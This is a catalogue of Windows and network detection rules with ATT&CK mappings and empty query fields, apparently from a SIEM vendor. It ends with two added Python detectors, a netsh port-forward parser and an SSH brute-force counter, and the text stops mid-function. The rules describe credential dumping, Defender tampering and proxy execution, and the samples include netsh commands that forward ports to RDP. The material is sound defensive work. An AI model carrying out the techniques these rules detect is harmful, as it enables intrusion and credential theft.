ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218.013 - Mavinject
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Use of Findstr Detected
Trigger Condition: When suspicious actions such as credential access, file download, or creation of an alternate data stream using findstr are detected. Findstr is generally used to search for strings in files or to filter command-line output. Adversaries can exploit it for defense evasion. However, general administrative use of findstr can trigger false positives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious File Overwrite Using extrac32 Detected
Trigger Condition: Suspicious actions such as credential access, file download, or creation of alternate data stream using findstr are detected. Generally, it is used to search for strings in files or to filter command line output. Adversaries can exploit it for defense evasion. However, general administrative use of findstr can trigger false positives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution via IE per User Utility
Trigger Condition: When ie4uinit is executed from unusual directories. Ie4uinit.exe (Internet Explorer Per-User Initialization) is a software component of Internet Explorer by Microsoft Corporation. Adversaries generally abuse ie4uinit.exe by overwriting it with malicious programs and spreading them via the internet so that they execute on target machines as legitimate processes.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Proxy Execution via xWizard
Trigger Condition: When the xWizard tool is executed with the runwizard and CLSID arguments to achieve proxy execution. xWizard is a Windows internal binary used to run Windows Component Object Model (COM) objects. COM is used to enable inter-process communication. A Class ID (CLSID) is a unique number representing a single application component in Windows. Adversaries can bypass defense mechanisms by proxying the execution of malicious content via xWizard.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - System Binary Proxy Execution
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious MSHTA Process Pattern
Trigger Condition: Suspicious mshta.exe process patterns are detected, such as the binary running from a non-default path, the mshta.exe binary masquerading as a different binary, and execution of an HTML Application (HTA) masquerading as a non-HTA file. Mshta.exe is a utility that executes HTA files. HTAs are standalone applications based on HTML and VBScript that can access local system resources, run scripts and display dynamic content. Adversaries may abuse mshta.exe to evade defenses by proxy-executing malicious files and JavaScript or VBScript through a trusted Windows utility.
ATT&CK Category: Defense Evasion, Execution
ATT&CK Tag: Mshta, Native API
ATT&CK ID: T1218.005, T1106
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_COM Object Execution via Shell Extension CLSID Verification Host
Trigger Condition: When verclsid.exe is used to run a COM object via its GUID. Verclsid.exe (Verify COM Shell Extension CLSID) is the Microsoft Windows native Shell Extension CLSID (Class ID) verification host, responsible for verifying each shell extension before Windows Explorer or the Windows Shell uses it. Adversaries may abuse verclsid.exe to execute malicious payloads (COM scriptlets) by running verclsid.exe and referencing files by Class ID (CLSID), a unique identification number used to identify COM objects.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Creation of Alternate Data Stream
Trigger Condition: When an alternate data stream is created. An Alternate Data Stream (ADS) is the ability of the NTFS file system to store additional streams of data for a file, in addition to the default stream. Attackers can leverage this little-known compatibility feature to hide hacking tools, keyloggers, and other malware on a compromised system and subsequently execute them undetected. It can also be used for data exfiltration. The alert requires the ADS_FILE_EXTENSIONS list to work.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1564.004 - NTFS File Attributes
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Alternate Data Stream Created using Findstr
Trigger Condition: When findstr is used to create an alternate data stream. Findstr is generally used to search for strings in files or to filter command-line output. Adversaries can exploit it to create an alternate data stream for defense evasion. For this alert to work, the ADS_FILE_EXTENSIONS list is required.
ATT&CK Category: Defense Evasion
ATT&CK Tag: NTFS File Attributes
ATT&CK ID: T1564.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Ngrok RDP Tunnel Detected
Trigger Condition: Execution of the Ngrok utility to tunnel an RDP connection. Threat actors often use Ngrok to expose internal services to the internet, such as making RDP publicly accessible. The 16777216 artifact is logged when an incoming RDP connection is established via ngrok.
ATT&CK Category: Command and Control
ATT&CK Tag: Protocol Tunneling
ATT&CK ID: T1572
Minimum Log Source Requirement: Windows
Query:
LP_Windows Defender Uninstall via PowerShell
Trigger Condition: When PowerShell is used to uninstall Windows Defender. PowerShell is a Microsoft task automation and configuration management program consisting of a command-line shell with its scripting language. Microsoft Defender Antivirus is an anti-malware component of Microsoft Windows. Adversaries can use this technique to avoid the detection of their malware.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1562 - Impair Defenses
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Hijacked Binary Execution via Settings Synchronizer
Trigger Condition: When SettingSyncHost is used to run hijacked binaries. SettingSyncHost is a Microsoft Windows host process that synchronizes system settings with other devices, including Internet Explorer, a mail application, OneDrive, Xbox and other application settings. Adversaries can exploit SettingSyncHost to run hijacked binaries and other specified files.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1574.008 - Path Interception by Search Order Hijacking
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Code Compilation via Visual Basic Command Line Compiler
Trigger Condition: This alert is triggered when successful compilation of code using the Visual Basic Command Line Compiler is detected. “Vbc.exe” is Microsoft’s Visual Basic compiler, used to compile programs from within the Visual Studio integrated development environment (IDE). Adversaries can leverage it to compile their malicious code on the system in order to bypass defensive countermeasures. Legitimate use of this tool can trigger false positives, but it is rarely used in enterprise environments; thus, detection of its use is considered suspicious.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1027.004 - Compile After Delivery
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious CLR Logs File Creation
Trigger Condition: When .NET code is executed via applications such as mshta, cscript, wscript, regsvr32 and wmic. .NET is a developer platform with tools and libraries for building applications, including web, mobile, desktop, games, IoT, cloud, and microservices. The Common Language Runtime in a .NET environment runs code and provides services to make the development process more manageable. The binaries included in the query are Windows internal binaries which adversaries can use to execute their malicious scripts.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: T1055 - Process Injection
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_CLR DLL Loaded via Scripting Application
Trigger Condition: This alert is triggered whenever a Common Language Runtime (CLR) DLL is loaded via scripting applications.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218.005 - Mshta
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Microsoft Defender Logging Disabled
Trigger Condition: This alert is triggered whenever the Windows Defender registry key is modified to disable Defender’s logging.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1562 - Impair Defenses
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_LSA Protected Process Light Disabled
Trigger Condition: When a modification of the Protected Process Light (PPL) registry value that disables it is detected. A Protected Process can be accessed by executables that are digitally signed with a unique Windows Media certificate, with administrator privilege. Protected Process Light is an extension of a protected process where a process can be assigned a different level of protection. Adversaries can use this technique to access the LSASS process and dump it to retrieve credentials.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1112 - Modify Registry
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Process Dump via Sqldumper Detected
Trigger Condition: This alert is triggered when a process dump via Sqldumper.exe is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: T1003 - OS Credential Dumping, T1003.001 - LSASS Memory
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: This alert is triggered whenever proxy execution of malicious payloads via PubPrn.vbs is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1216.001 - PubPrn
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_File Download via IMEWDBLD
Trigger Condition: When a network connection initiated by the IMEWDBLD.exe binary is detected. IMEWDBLD.EXE is part of the Microsoft Input Method Editor (IME). An IME is a software component that enables a user to enter text in a language that can’t easily be typed using a standard keyboard. Adversaries can use this technique to download a payload from a remote system.
ATT&CK Category: Command and Control
ATT&CK Tag: T1105 - Ingress Tool Transfer
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Remote Thread Created via Ttdinject
Trigger Condition: This alert is triggered whenever a remote thread or process is created by the ttdinject binary.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1127 - Trusted Developer Utilities Proxy Execution
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Proxy Download via OneDriveStandaloneUpdater
Trigger Condition: When the OneDriveStandaloneUpdater registry value is modified. OneDriveStandaloneUpdater.exe is a binary that belongs to the Standalone Updater process and comes with Microsoft OneDrive. Adversaries can use this technique to transfer tools or other files to the victim system from a URL that is set in the OneDriveStandaloneUpdater registry value. Registry auditing must be enabled, and permission must be granted for auditing the OneDriveStandaloneUpdater registry key.
ATT&CK Category: Command and Control
ATT&CK Tag: T1105 - Ingress Tool Transfer
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Remote Connection Established via Msbuild
Trigger Condition: This alert is triggered whenever a network connection is initiated via Msbuild while building an application.
ATT&CK Category: Defense Evasion
ATT&CK Tag: MSBuild
ATT&CK ID: T1127.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Executables Started in Suspicious Folder
Trigger Condition: This alert is triggered whenever it detects execution of binaries from a suspicious folder.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Curl Silent Mode Execution Detected
Trigger Condition: When curl is run in silent mode. Client URL (curl) is a command-line tool used to transfer data to and from a server. Adversaries can use this technique to suppress the file transfer progress display and redirect output to a file.
ATT&CK Category: Command and Control
ATT&CK Tag: T1105 - Ingress Tool Transfer
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_High Volume of File Modification or Deletion in Short Span
Trigger Condition: When 30 file modifications or deletions are detected within a single minute. A large number of file modifications and deletions is an indicator of ransomware. Based on requirements and the number of observed false positives, a user can modify the number of events needed or the time frame. To generate logs, enable the auditing policy for the relevant folders. When a user or software modifies a large number of files, this can result in a false positive; to reduce false positives, exclude that process in the query.
ATT&CK Category: Impact
ATT&CK Tag: T1565 - Data Manipulation
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution of Temporary Files Via Office Application
Trigger Condition: When an Office application creates a child process that executes a file with the .tmp extension. Adversaries use this technique to avoid detection by using a legitimate application to run a payload that is masquerading as a temporary file.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1036 - Masquerading
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious Image Loaded Via Excel
Trigger Condition: When an unsigned image is loaded via Excel. An XLL file is an add-in used by Microsoft Excel. It contains extra functions, templates, or other tools that enhance the capabilities of Excel; examples of add-ins include custom chart generators and template managers. Adversaries can use this technique to load malicious unsigned add-ins to execute their payload or download malware from a remote server.
ATT&CK Category: Persistence
ATT&CK Tag: T1137 - Office Application Startup, T1137.001 - Office Template Macros
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Malicious Chrome Extension Detected
Trigger Condition: When malicious Chrome extension IDs are detected by Osquery. This analytic relies on the chrome_extensions table and requires analysts to keep an up-to-date list of malicious Chrome extension IDs.
ATT&CK Category: Persistence
ATT&CK Tag: T1176 - Browser Extensions
Minimum Log Source Requirement: Windows, Unix
Query:
LP_Chrome Extension Installed Outside of the Webstore
Trigger Condition: When malicious Chrome extensions are installed from outside the official Chrome Web Store. Adversaries can manually install a browser extension via batch, PowerShell or VBS scripts. Analysts need to make sure they place the correct event types in the query.
ATT&CK Category: Persistence
ATT&CK Tag: T1176 - Browser Extensions
Minimum Log Source Requirement: Windows, Unix
Query:
LP_Browser Credential Files Accessed
Trigger Condition: When access to the stored-credential files of a browser (Chrome, Edge or Firefox) is detected. When a user saves credentials in the browser, those credentials are stored in the files included in the query. Adversaries can access those files in an attempt to retrieve the stored credentials.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1202 - Indirect Command Execution
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Exchange ProxyShell Pattern Detected
Trigger Condition: When a URL pattern associated with ProxyShell exploitation attempts (both successful and failed) against Exchange servers is detected. ProxyShell is an attack chain that exploits three known vulnerabilities in Microsoft Exchange: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. Adversaries may exploit these vulnerabilities to perform remote code execution.
ATT&CK Category: Initial Access
ATT&CK Tag: T1190 - Exploit Public-Facing Application
Minimum Log Source Requirement: Webserver
Query:
LP_Successful Exchange ProxyShell Attack
Trigger Condition: When a URL pattern and status code associated with a successful ProxyShell exploitation attack against Exchange servers are detected. ProxyShell is an attack chain that exploits three known vulnerabilities in Microsoft Exchange: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. Adversaries may exploit these vulnerabilities to perform remote code execution.
ATT&CK Category: Initial Access
ATT&CK Tag: T1190 - Exploit Public-Facing Application
Minimum Log Source Requirement: Webserver
Query:
LP_DLL Loaded Via AllocConsole and RunDLL32
Trigger Condition: When DLL loading through the AllocConsole function and rundll32 is detected. AllocConsole is a Windows internal function that allocates a new console for the calling process. Rundll32.exe is a Windows internal binary that loads and runs 32-bit dynamic-link libraries (DLLs). Adversaries can use this technique to execute their payload by using rundll32 to load a malicious DLL while invoking the AllocConsole function.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218.011 - Rundll32
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Active Directory Database Dump Attempt
Trigger Condition: When an attempt to dump the ntds.dit file is detected. The NTDS.dit file is the database that stores Active Directory data (including users, groups, security descriptors and password hashes). Adversaries can use this technique to retrieve credentials and obtain other domain information.
ATT&CK Category: Credential Access
ATT&CK Tag: T1003.003 - NTDS
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Usage of Web Request Command
Trigger Condition: Usage of various web request commands via command-line tools and Windows PowerShell cmdlets (including aliases) on the command line.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows, Windows Sysmon, PowerShell
Query:
LP_Reconnaissance Activity with Nltest
Trigger Condition: When possible reconnaissance activity via the nltest binary is detected. Nltest is a Windows command-line utility that comes with Windows Server and is used to list domain controllers and enumerate domain trusts. The binary is available if the AD DS or AD LDS server role is installed. It is also available if the Active Directory Domain Services Tools, part of the Remote Server Administration Tools (RSAT), are installed. Adversaries can use this technique to discover domain controllers and users and to query domain trust relationships.
ATT&CK Category: Discovery
ATT&CK Tag: T1016 - System Network Configuration Discovery, T1482 - Domain Trust Discovery
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Regsvr32 Network Activity Detected
Trigger Condition: When network connections, application-layer protocol activity, or DNS queries initiated via the regsvr32 binary are detected. Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls, in the Windows Registry. Adversaries utilize regsvr32 to run a malicious DLL, which then downloads their other stager payloads.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Regsvr32
ATT&CK ID: T1218.010
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Privilege Escalation via Kerberos KrbRelayUp
Trigger Condition: KrbRelayUp performs a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced. KrbRelayUp is a wrapper that can streamline the use of some features in Rubeus, KrbRelay, SCMUACBypass, PowerMad/SharpMad, Whisker and ADCSPwn tools in attacks.
ATT&CK Category: Credential Access, Lateral Movement
ATT&CK Tag: Pass the Ticket, Kerberoasting
ATT&CK ID: T1550.003, T1558.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Insecure Policy Set via Set-ExecutionPolicy
Trigger Condition: Use of the Set-ExecutionPolicy command to set insecure policies such as Unrestricted, Bypass and RemoteSigned is detected. Adversaries can utilize this technique to change the execution policy in order to execute malicious PowerShell scripts of their choice.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Network Connection to Suspicious Server
Trigger Condition: Communication between hosts and the domains mentioned in the query’s list. The query searches logs generated by Windows systems, proxies and firewalls. The sites mentioned in the query are file-storing or file-hosting sites. Adversaries have utilized these sites in many campaigns to upload and download data.
ATT&CK Category: Command and Control
ATT&CK Tag: Ingress Tool Transfer
ATT&CK ID: T1105
Minimum Log Source Requirement: Windows Sysmon, Firewall, Proxy Server, WAF
Query:
LP_Activity Related to NTDS Domain Hash Retrieval
Trigger Condition: Copying of the ntds.dit file, which is the database that stores Active Directory data, such as users, groups, security descriptors, and password hashes.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, NTDS
ATT&CK ID: T1003,T1003.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Application Shimming - File Access Detected
Trigger Condition: This alert is triggered whenever installation of new shims or registration of shims is detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Event Triggered Execution, Application Shimming
ATT&CK ID: T1546, T1546.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Audio Capture Detected
Trigger Condition: The alert is triggered whenever suspicious audio capture is detected.
ATT&CK Category: Collection
ATT&CK Tag: Audio Capture
ATT&CK ID: T1123
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Auditd High Volume of File Modification or Deletion in Short Span
Trigger Condition: This alert is triggered whenever 30 file modifications or deletions are detected within a span of 1 minute.
Minimum Log Source Requirement: Unix
Query:
LP_Autorun Keys Modification Detected
Trigger Condition: This alert is triggered whenever it detects modification of an autostart extensibility point (ASEP) in the registry.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_BlueMushroom DLL Load Detected
Trigger Condition: This alert is triggered whenever it detects a suspicious DLL loading from the AppData Local path.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Capture a Network Trace with netsh
Trigger Condition: This alert is triggered whenever it detects a network trace capture via netsh.exe trace functionality.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: This alert is triggered whenever osquery detects a Chrome extension installed with the “devtools” permission. Look for unusual extensions installed with this permission and check whether the extension was installed from the Chrome Web Store.
Minimum Log Source Requirement: Windows, Unix
Query:
LP_Citrix ADC VPN Directory Traversal Detected
Trigger Condition: This alert is triggered whenever exploitation attempt of directory traversal vulnerability (CVE-2019-19781) in Citrix ADC is detected.
Minimum Log Source Requirement: Web Server, Firewall
Query:
LP_Cmdkey Cached Credentials Recon Detected
Trigger Condition: This alert is triggered whenever it detects usage of cmdkey to look for cached credentials.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Command Obfuscation via Environment Variable Concatenation Reassembly
Trigger Condition: This alert is triggered whenever command obfuscation in command prompt via environment variable concatenation reassembly is detected.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Control Panel Items - Registry Detected
Trigger Condition: This alert is triggered whenever modification of Control Panel registry sub-keys is detected.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Credentials Access in Files Detected
Trigger Condition: This alert is triggered whenever command line arguments containing pattern to search “pass” in files are detected.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Default Blocked Outbound Traffic followed by Allowed Event
Trigger Condition: This alert is triggered whenever blocked outbound traffic is followed by allowed traffic.
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Default Connection Attempts on Closed Port
Trigger Condition: This alert is triggered whenever a connection is attempted on a closed port. The ALERT_OPEN_PORTS list needs to be updated with the ports that are actually open.
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Default Unapproved Port Activity Detected
Trigger Condition: This alert is triggered whenever a user uses ports that are not approved for use. It monitors traffic where the source port, destination port or any other port field matches a port listed in the “UNAPPROVED_PORT” static list. Attackers may use unapproved ports to bypass security controls such as firewalls or intrusion detection systems, which often monitor and restrict traffic only on standard or known ports. The “UNAPPROVED_PORT” list must be updated to reflect organizational needs.
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Direct Autorun Keys Modification Detected
Trigger Condition: This alert is triggered whenever it detects a modification to the direct autorun keys on a system (ASEP) in the registry using reg.exe.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Empire PowerShell UAC Bypass Detected
Trigger Condition: This alert is triggered whenever it detects Empire PowerShell UAC bypass methods. Empire is a post-exploitation framework featuring a fully PowerShell-based agent for Windows (version 2.0) and a Python-based agent for Linux and OS X (compatible with Python 2.6 and 2.7).
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution in Outlook Temp Folder Detected
Trigger Condition: This alert is triggered whenever it detects a suspicious program execution in Outlook temp folder.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution of Temporary Files via Office Application
Trigger Condition: This alert is triggered whenever an Office application creates a child process that executes a file with a “.tmp” extension.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_External Disk Drive or USB Storage Device Detected
Trigger Condition: This alert is triggered whenever it detects external disk drives or plugged-in USB storage devices.
Minimum Log Source Requirement: Windows
Query:
LP_File Downloaded from Suspicious URL Using GfxDownloadWrapper
Trigger Condition: This alert is triggered when a file download from a suspicious (non-standard) URL using GfxDownloadWrapper.exe is detected.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Hidden Files and Directories Detected
Trigger Condition: This alert is triggered whenever it detects the use of the attrib.exe binary to set a file's hidden or system attribute.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_IIS Native-Code Module Command Line Installation
Trigger Condition: This alert is triggered whenever it detects suspicious installation of an IIS native-code module via the command line. An IIS native-code module is a component of Microsoft’s Internet Information Services (IIS) that allows developers to extend IIS functionality as needed. Adversaries can leverage it as a covert backdoor into servers, which allows them to hide deep in target environments and gives them a durable persistence mechanism. Legitimate installation from the command line may also trigger false positives.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Install Root Certificate
Trigger Condition: This alert is triggered when a root certificate or related registry value is set up or modified.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_LanmanServer Registry Value Modified
Trigger Condition: This alert is triggered whenever the LanmanServer registry value MaxMpxCt is modified.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Large ICMP Traffic
Trigger Condition: This alert is triggered when ICMP datagrams larger than 1024 bytes are received.
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Lsass Memory Dump with MiniDumpWriteDump API Detected
Trigger Condition: This alert is triggered whenever it detects the use of the MiniDumpWriteDump API to dump lsass.exe memory in a stealthy way. Tools like Process Hacker and some attacker tradecraft use this API, which is exported by dbghelp.dll or dbgcore.dll. As an example, the SILENTTRINITY C2 framework has a module that leverages this API to dump the contents of lsass.exe and transfer it over the network back to the attacker’s machine.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_MSHTA Spawned by SVCHOST Detected
Trigger Condition: This alert is triggered whenever MSHTA binary is spawned by Svchost process.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious Use of Print Binary Detected
Trigger Condition: This alert is triggered whenever print.exe is used for remote file copy.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Malware Threat Connection to Malicious Destination
Trigger Condition: This alert is triggered when an outbound connection to a malicious destination is made by any host.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Memory Dump via Adplus
Trigger Condition: This alert is triggered whenever LSASS process dump via adplus.exe is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_MiniNt Registry Key Addition
Trigger Condition: This alert is triggered whenever it detects the addition of a key ‘MiniNt’ to the registry.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Netsh Port Forwarding Detected
Trigger Condition: This alert is triggered whenever it detects netsh commands that configure port forwarding.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
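Seeing that a netsh portproxy rule was added is only half of the triage; the analyst needs the listen and connect endpoints to know which service is being tunnelled. The following is an added example, not the page's query or vendor code, that extracts the rule from constructed Sysmon process-creation records and flags pivots to common remote-access ports. It assumes netsh accepts unambiguous keyword prefixes (int, p, a) as seen in practice, and that connectport defaults to listenport when omitted, as the netsh documentation states.

```python
import re
from typing import Dict, Iterable, List, Optional

# netsh accepts unambiguous prefixes of its keywords (assumption: 'int' for
# 'interface', 'p' for 'portproxy', 'a' for 'add' are the forms seen in practice),
# so the pattern tolerates them rather than requiring the full words.
_PORTPROXY_RE = re.compile(
    r"netsh(?:\.exe)?\s+(?:interface|int|i)\s+(?:portproxy|p)\s+(?P<verb>add|a|delete|d)\s+"
    r"(?P<mode>v4tov4|v4tov6|v6tov4|v6tov6)\b(?P<args>.*)",
    re.IGNORECASE,
)
_KV_RE = re.compile(r"(\w+)=(\S+)")

# Target ports worth calling out explicitly in the alert text.
PIVOT_PORTS = {"3389": "RDP", "445": "SMB", "5985": "WinRM", "5986": "WinRM-HTTPS", "22": "SSH"}


def parse_portproxy(cmdline: str) -> Optional[Dict[str, str]]:
    """Return the forwarding rule encoded in a netsh portproxy command line, or None."""
    m = _PORTPROXY_RE.search(cmdline)
    if not m:
        return None
    rule = {"verb": "add" if m.group("verb").lower().startswith("a") else "delete",
            "mode": m.group("mode").lower()}
    rule.update((k.lower(), v) for k, v in _KV_RE.findall(m.group("args")))
    return rule


def assess_portproxy(rule: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Summarise listen/target endpoints; connectport defaults to listenport per netsh docs."""
    listen_port = rule.get("listenport", "?")
    target_port = rule.get("connectport", listen_port)
    return {
        "listen": f"{rule.get('listenaddress', '*')}:{listen_port}",
        "target": f"{rule.get('connectaddress', '?')}:{target_port}",
        "pivots_to": PIVOT_PORTS.get(target_port),
    }


# Constructed Sysmon event 1 records (fields reduced to what the rule needs).
SAMPLE_EVENTS = [
    {"event_id": 1, "user": r"CORP\svc-backup",
     "command_line": "netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 "
                     "connectport=3389 connectaddress=10.0.0.7"},
    {"event_id": 1, "user": r"CORP\bob", "command_line": "netsh advfirewall show allprofiles"},
    {"event_id": 1, "user": r"CORP\svc-backup",
     "command_line": "netsh i p a v4tov4 listenport=8080 connectaddress=192.0.2.44"},
]


def find_port_forwards(events: Iterable[Dict]) -> List[Dict[str, Optional[str]]]:
    """Return one enriched record per command line that adds a portproxy rule."""
    out: List[Dict[str, Optional[str]]] = []
    for ev in events:
        if ev.get("event_id") != 1:
            continue
        rule = parse_portproxy(ev.get("command_line", ""))
        if rule and rule["verb"] == "add":
            out.append({"user": ev.get("user"), **rule, **assess_portproxy(rule)})
    return out


if __name__ == "__main__":
    for fwd in find_port_forwards(SAMPLE_EVENTS):
        print(f"{fwd['user']}: {fwd['listen']} -> {fwd['target']} ({fwd['pivots_to'] or 'other'})")
```

The delete verb is parsed as well so a follow-up query can pair the clean-up with the original add; the persisted rules live under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy, which is the place to confirm on the host.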
LP_Network Share Discovery
Trigger Condition: This alert is triggered when network share discovery activities are detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Non Interactive PowerShell Execution
Trigger Condition: This alert is triggered whenever it detects non-interactive PowerShell activity. Non-interactive PowerShell is an execution of powershell.exe without explorer.exe as its parent process.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Non-Existent User Login Attempt Detected
Trigger Condition: This alert is triggered whenever 8 login attempts for non-existent users on the SSH service are detected within 1 minute.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Unix
Query:
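Both this rule and LP_Auditd High Volume of File Modification or Deletion in Short Span above are threshold-in-window detections (N events per key inside a trailing time window), and the interesting part is the window bookkeeping, not the pattern match. The following is an added example, not the page's query or vendor code, that applies the 8-in-60-seconds rule per source IP to a constructed auth.log excerpt; the same sliding_window_hits helper serves the auditd case with a different parser and key. The sshd message format is the one OpenSSH emits for unknown usernames; the hostnames, IPs and PIDs are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, List, Tuple

# sshd logs unknown usernames as "Invalid user <name> from <ip> port <port>".
# Syslog timestamps carry no year, so strptime yields 1900; that is fine for
# window arithmetic within one file except across a year boundary.
_INVALID_USER_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8}) \S+ sshd\[\d+\]: Invalid user (?P<user>\S*) from (?P<ip>\S+)"
)


def sliding_window_hits(events: Iterable[Tuple[str, datetime]], threshold: int,
                        window: timedelta) -> Dict[str, datetime]:
    """For time-ordered (key, timestamp) pairs, return the first timestamp at which
    each key accumulates `threshold` events inside a trailing `window`."""
    buckets: Dict[str, Deque[datetime]] = defaultdict(deque)
    fired: Dict[str, datetime] = {}
    for key, ts in events:
        q = buckets[key]
        q.append(ts)
        while ts - q[0] > window:  # drop events that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in fired:
            fired[key] = ts
    return fired


def detect_invalid_user_bursts(lines: Iterable[str], threshold: int = 8,
                               window_seconds: int = 60) -> Dict[str, datetime]:
    """Apply the rule's 8-in-60s threshold per source IP over raw auth.log lines."""
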